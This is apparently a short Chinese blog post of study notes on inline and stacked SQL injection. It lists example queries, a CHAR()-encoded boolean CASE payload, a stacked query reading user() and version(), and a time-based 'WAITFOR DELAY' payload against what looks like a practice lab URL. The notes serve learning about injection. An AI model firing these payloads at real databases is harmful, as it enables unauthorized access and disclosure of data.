内联注入和堆叠注入

一、内联注入

  select id from (select 1 as id)a;

   select * from T1,T3 where T1.userid=T3.userid;

   select * from admin,news where admin.uid=news.tid;

   select * from admin where uid = 1 and (SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5032=5032) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))

 二、堆叠注入

  堆叠恶意sql语句,威胁度极高。

  select * from news;select 1,2,3,4,user(),version();

  payload:id=1;WAITFOR DELAY '0:0:5'--

  http://……/less-2.asp?id=1;WAITFOR DELAY '0:0:5'--

 

 

posted @ 2019-10-31 00:24  远书  阅读(443)  评论(0编辑  收藏